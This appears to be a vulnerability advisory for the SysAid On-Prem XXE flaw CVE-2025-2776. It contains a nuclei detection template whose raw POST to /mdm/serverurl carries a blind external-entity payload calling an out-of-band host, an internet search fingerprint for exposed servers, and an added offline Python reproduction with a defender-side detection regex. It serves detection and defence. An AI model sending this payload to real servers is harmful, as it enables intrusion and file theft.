Vulnerability information
Vulnerability name: SysAid On-Prem XML External Entity Vulnerability
Vulnerability ID: CVE-2025-2776
Vulnerability type: XML External Entity injection (XXE)
Severity: Critical
Description: SysAid On-Prem is a widely deployed IT service management (ITSM) product providing a service desk, asset management, remote control and related functions; it is normally installed inside the corporate network to support IT service processes, and its breadth of features and ease of use have given it a broad install base worldwide. The vulnerability described here is an XML External Entity (XXE) injection. The Server URL handling functionality, reached through an unauthenticated POST to /mdm/serverurl with an application/xml body, passes the submitted document to an XML parser without disabling DTD processing or external entity resolution, so an attacker can declare a parameter entity whose SYSTEM identifier points at a host they control and have the server fetch it. This gives an unauthenticated, network-reachable, fully automatable attack that yields arbitrary file read on the server and administrator account takeover (the referenced watchTowr write-up describes chaining it on to remote code execution). An attacker who succeeds can obtain sensitive material such as configuration files and credential stores and may gain full control of the affected system, with data theft and service disruption as the consequences. Note that the nuclei check below is a blind probe: it only confirms that the parser resolves an attacker-supplied external DTD (the callback's Java User-Agent identifies the SysAid JVM) and does not itself read any file.
Vendor: sysaid
Product: SysAid On-Prem
Affected versions: <= 23.3.40
Search query (FOFA): icon_hash=1540720428
Source: https://github.com/projectdiscovery/nuclei-templates/blob/01a59299771e9178d0aadf2065d772c10e58fac8/http%2Fcves%2F2025%2FCVE-2025-2776.yaml
Type: projectdiscovery/nuclei-templates:github issues
PoC details
```yaml
id: CVE-2025-2776

info:
  name: SysAid On-Prem <= 23.3.40 - XML External Entity
  author: johnk3r
  severity: critical
  description: |
    SysAid On-Prem versions <= 23.3.40 are vulnerable to an unauthenticated XML External Entity (XXE) vulnerability in the Server URL processing functionality, allowing for administrator account takeover and file read primitives.
  reference:
    - https://labs.watchtowr.com/sysowned-your-friendly-rce-support-ticket/
    - https://documentation.sysaid.com/docs/24-40-60
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:N/A:L
    cvss-score: 9.3
    cve-id: CVE-2025-2776
    cwe-id: CWE-611
  metadata:
    max-request: 1
    vendor: sysaid
    product: sysaid
    shodan-query: http.favicon.hash:"1540720428"
    fofa-query: icon_hash=1540720428
  tags: cve,cve2025,sysaid,xxe,oast,kev

variables:
  filename: "{{to_lower(rand_text_alpha(5))}}"

http:
  - raw:
      - |
        POST /mdm/serverurl HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/xml

        <?xml version="1.0" ?>
        <!DOCTYPE foo [
          <!ENTITY % foo SYSTEM "http://{{interactsh-url}}/{(unknown)}.dtd">
          %foo;
        ]>

    # Blind check: the template matches only when the interactsh server
    # receives an HTTP hit for the DTD from a Java client (the SysAid JVM).
    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"

      - type: word
        part: interactsh_request
        words:
          - "User-Agent: Java"
# digest: 4a0a004730450221009ffafa0476d394123979effc151d2ac8c727f3be02eeda0c11df177569e6f4b1022035f504c432fe0de8f23d93ac9b46f01e0e7380f2a0e202f7c2762f5e24d1583d:922c64590222798bb761d5b6d8e72950
```
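The following Python is an added example written for this page; it is not code from the nuclei project, SysAid, or the template's author. It reproduces offline what the template above does: it builds the blind XXE probe for /mdm/serverurl, applies the template's two matchers to an out-of-band callback record, and adds the defender-side counterpart, a check that flags inbound XML bodies to that endpoint carrying an external entity declaration (the shape of both the probe and a file-read payload). The hostnames, the callback record and the sample request bodies are constructed for the example; `Content-Length` is added here because nuclei computes it for raw requests, and the helper names are the example's own.

```python
"""Offline reproduction of the CVE-2025-2776 nuclei check (added example).

build_probe()      - the raw POST the template sends (blind XXE via external parameter entity)
template_matches() - the template's matchers, ANDed, over one interactsh callback record
is_xxe_request()   - defender-side check for the same payload shape hitting /mdm/serverurl
All inputs below are constructed; nothing here contacts a network.
"""
import random
import re
import string


def rand_filename(n=5, rng=random):
    """Mimics the template variable {{to_lower(rand_text_alpha(5))}}."""
    return "".join(rng.choice(string.ascii_lowercase) for _ in range(n))


def build_probe(host, oast_host, filename=None):
    """Return (headers, body) for the template's raw request.

    The DTD declares parameter entity %foo with a SYSTEM identifier on the
    attacker-controlled OAST host; '%foo;' forces the parser to fetch it while
    the DOCTYPE is processed, which is the only signal a blind probe needs.
    """
    filename = filename or rand_filename()
    body = (
        '<?xml version="1.0" ?>\n'
        "<!DOCTYPE foo [\n"
        f'  <!ENTITY % foo SYSTEM "http://{oast_host}/{filename}.dtd">\n'
        "  %foo;\n"
        "]>\n"
    )
    headers = (
        "POST /mdm/serverurl HTTP/1.1\r\n"
        f"Host: {host}\r\n"
        "Content-Type: application/xml\r\n"
        f"Content-Length: {len(body.encode())}\r\n"  # added; nuclei fills this in
        "\r\n"
    )
    return headers, body


def template_matches(interaction):
    """Apply the template's matchers (matchers-condition: and) to one callback.

    `interaction` mirrors the two nuclei parts the template reads:
      protocol -> interactsh_protocol, request -> interactsh_request.
    Both are 'word' matchers, i.e. substring checks.
    """
    proto_ok = "http" in interaction.get("protocol", "")
    ua_ok = "User-Agent: Java" in interaction.get("request", "")
    return proto_ok and ua_ok


# Defender side: a DOCTYPE declaring an external (SYSTEM/PUBLIC) general or
# parameter entity is never expected in a legitimate Server URL body.
_DOCTYPE = re.compile(r"<!DOCTYPE\b", re.IGNORECASE)
_EXTERNAL_ENTITY = re.compile(
    r"<!ENTITY\s+(?:%\s*)?[\w.-]+\s+(?:SYSTEM|PUBLIC)\b", re.IGNORECASE
)


def is_xxe_request(path, content_type, body):
    """True when an XML body sent to the vulnerable endpoint carries an
    external entity declaration (covers both the blind probe above and a
    file-read payload such as <!ENTITY x SYSTEM "file:///...">)."""
    if not path.startswith("/mdm/serverurl"):
        return False
    if "xml" not in content_type.lower():
        return False
    return bool(_DOCTYPE.search(body) and _EXTERNAL_ENTITY.search(body))


if __name__ == "__main__":
    hdrs, body = build_probe("sysaid.example.internal", "abcd1234.oast.example")
    print(hdrs + body)

    # Constructed callback record, shaped like what interactsh reports
    # when the SysAid JVM fetches the DTD.
    callback = {
        "protocol": "http",
        "request": "GET /qwert.dtd HTTP/1.1\r\nUser-Agent: Java/17.0.9\r\n"
                   "Host: abcd1234.oast.example\r\n\r\n",
    }
    print("template matches:", template_matches(callback))
    print("flagged inbound:", is_xxe_request("/mdm/serverurl", "application/xml", body))
```

The word matcher semantics matter when reading the template: `"http"` also matches a callback reported as `https`, and `"User-Agent: Java"` is what distinguishes the target's own JVM from a scanner or proxy that happened to follow the URL. On the defensive side, the vendor fix (SysAid 24.4.60 per the reference above) is the real remedy; the request check is a stop-gap for a WAF or SIEM rule and should be paired with disabling DTD processing in any XML parser you own.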